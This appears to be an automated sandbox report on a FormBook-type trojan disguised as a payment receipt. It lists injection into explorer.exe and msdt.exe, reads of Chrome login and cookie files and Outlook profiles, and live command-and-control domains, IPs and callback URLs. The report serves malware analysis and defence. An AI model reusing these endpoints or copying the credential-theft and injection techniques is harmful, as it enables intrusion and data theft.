          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0040C327 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040AA91 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040AD6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040F6B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Domain query: www.bem4u.shop
          Source: C:\Windows\explorer.exe | Domain query: www.030332.com
          Source: C:\Windows\explorer.exe | Domain query: www.vnsuda.lol
          Source: C:\Windows\explorer.exe | Domain query: www.stephapproved.com
          Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exe | Network Connect: 70.32.23.81 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.110.163.134 80
          Source: C:\Windows\explorer.exe | Domain query: www.coolfashionshop.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 103.100.208.243 80
          Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: AF0000
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\fcvvthv.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Thread register set: target process: 3320
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 3320
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.310535687.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.300903726.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0040ABAB cpuid
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0040A81B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\msdt.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          ATT&CK matrix, listed per tactic (numbers in parentheses are the counts the report shows next to a technique):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Command and Scripting Interpreter (2); Native API (1); Shared Modules (1); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection (512); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing; Steganography; Compile After Delivery
          Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: System Time Discovery (1); Security Software Discovery (141); Virtualization/Sandbox Evasion (1); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (15)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Email Collection (1); Input Capture (21); Archive Collected Data (1); Data from Local System (1); Clipboard Data (2); GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph ID: 756109
Sample: payment_copy2_receipt.exe
Startdate: 29/11/2022
Architecture: WINDOWS
Score: 100

Start
  DNS/IP: www.kahrabaonline.com
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures
  started: payment_copy2_receipt.exe 19
    dropped: C:\Users\user\AppData\Local\...\nssAD55.tmp, COM
    dropped: C:\Users\user\AppData\Local\...\fcvvthv.exe, PE32
    started: fcvvthv.exe 1
      Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Maps a DLL or memory area into another process
      started: fcvvthv.exe
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        injected: explorer.exe
          DNS/IP: 58777.zhanghonghong.com 103.100.208.243, 49712, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong
          DNS/IP: bem4u.shop 2.57.90.16, 49720, 49721, 80 AS-HOSTINGERLT Lithuania
          DNS/IP: 6 other IPs or domains
          Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
          started: msdt.exe 13
            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
      started: conhost.exe

Antivirus detection, submitted file
Source | Detection | Scanner | Label
payment_copy2_receipt.exe | 54% | ReversingLabs | Win32.Trojan.Injuke
payment_copy2_receipt.exe | 38% | Virustotal |

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\fcvvthv.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\fcvvthv.exe | 54% | ReversingLabs | Win32.Trojan.FormBook
C:\Users\user\AppData\Local\Temp\nssAD55.tmp | 0% | ReversingLabs |

Antivirus detection, unpacked memory dumps
Source | Detection | Scanner | Label
1.2.fcvvthv.exe.21d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.fcvvthv.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.payment_copy2_receipt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
3.0.fcvvthv.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.payment_copy2_receipt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491

Antivirus detection, domains
Source | Detection | Scanner | Label
stephapproved.com | 4% | Virustotal |

Antivirus detection, URLs
Source | Detection | Scanner | Label
http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v | 100% | Avira URL Cloud | malware
http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT | 100% | Avira URL Cloud | malware
http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs | 100% | Avira URL Cloud | malware
https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV | 100% | Avira URL Cloud | malware
http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs | 100% | Avira URL Cloud | malware
http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM | 100% | Avira URL Cloud | malware
http://www.bem4u.shop/veh0/ | 100% | Avira URL Cloud | malware
http://www.vnsuda.lol/veh0/ | 100% | Avira URL Cloud | malware
http://www.coolfashionshop.xyz/veh0/ | 100% | Avira URL Cloud | malware
www.projectlis.online/veh0/ | 100% | Avira URL Cloud | malware
http://www.stephapproved.com/veh0/ | 100% | Avira URL Cloud | malware
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
stephapproved.com | 70.32.23.81 | true | true | | unknown
58777.zhanghonghong.com | 103.100.208.243 | true | true | | unknown
www.vnsuda.lol | 75.2.115.196 | true | true | | unknown
www.coolfashionshop.xyz | 34.110.163.134 | true | false | | unknown
bem4u.shop | 2.57.90.16 | true | true | | unknown
www.kahrabaonline.com | 160.121.219.144 | true | false | | unknown
www.bem4u.shop | unknown | unknown | true | | unknown
www.030332.com | unknown | unknown | true | | unknown
www.stephapproved.com | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.stephapproved.com/veh0/ | true | Avira URL Cloud: malware | unknown
http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs | true | Avira URL Cloud: malware | unknown
www.projectlis.online/veh0/ | true | Avira URL Cloud: malware | low
http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v | true | Avira URL Cloud: malware | unknown
http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs | true | Avira URL Cloud: malware | unknown
http://www.vnsuda.lol/veh0/ | true | Avira URL Cloud: malware | unknown
http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT | true | Avira URL Cloud: malware | unknown
http://www.bem4u.shop/veh0/ | true | Avira URL Cloud: malware | unknown
http://www.coolfashionshop.xyz/veh0/ | false | Avira URL Cloud: malware | unknown
http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM | false | Avira URL Cloud: malware | unknown
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV | msdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | n5335GITL.12.dr | false | | high
https://cdn.ecosia.org/assets/images/ico/fP | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
https://www.ecosia.org/search?q= | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://search.yahoo.com?fr=crmas_sfpf | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | n5335GITL.12.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | payment_copy2_receipt.exe | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
https://ac.ecosia.org/autocomplete?q= | n5335GITL.12.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr | false | | high
http://nsis.sf.net/NSIS_Error | payment_copy2_receipt.exe | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | n5335GITL.12.dr | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
75.2.115.196 | www.vnsuda.lol | United States | 16509 | AMAZON-02US | true
70.32.23.81 | stephapproved.com | United States | 55293 | A2HOSTINGUS | true
34.110.163.134 | www.coolfashionshop.xyz | United States | 15169 | GOOGLEUS | false
103.100.208.243 | 58777.zhanghonghong.com | Hong Kong | 133115 | HKKFGL-AS-APHKKwaifongGroupLimitedHK | true
2.57.90.16 | bem4u.shop | Lithuania | 47583 | AS-HOSTINGERLT | true
                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:756109
                                                      Start date and time:2022-11-29 16:41:08 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:payment_copy2_receipt.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@6/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 77.8% (good quality ratio 72%)
                                                      • Quality average: 72.8%
                                                      • Quality standard deviation: 31.2%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
